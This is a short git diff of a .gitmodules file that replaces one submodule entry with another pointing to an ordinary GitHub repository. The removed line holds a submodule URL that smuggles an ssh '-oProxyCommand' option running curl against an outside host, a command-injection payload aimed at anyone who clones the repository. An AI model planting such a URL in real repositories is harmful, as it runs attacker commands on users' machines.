--- a/.gitmodules
+++ b/.gitmodules
@@ -1,3 +1,3 @@
-[submodule "test"]
-	path = test
-	url = ssh://-oProxyCommand=curl pwny.in/git@github.com:/timwr/test.git
+[submodule "sub"]
+	path = sub
+	url = https://github.com/bug-hunter/bmstu-web
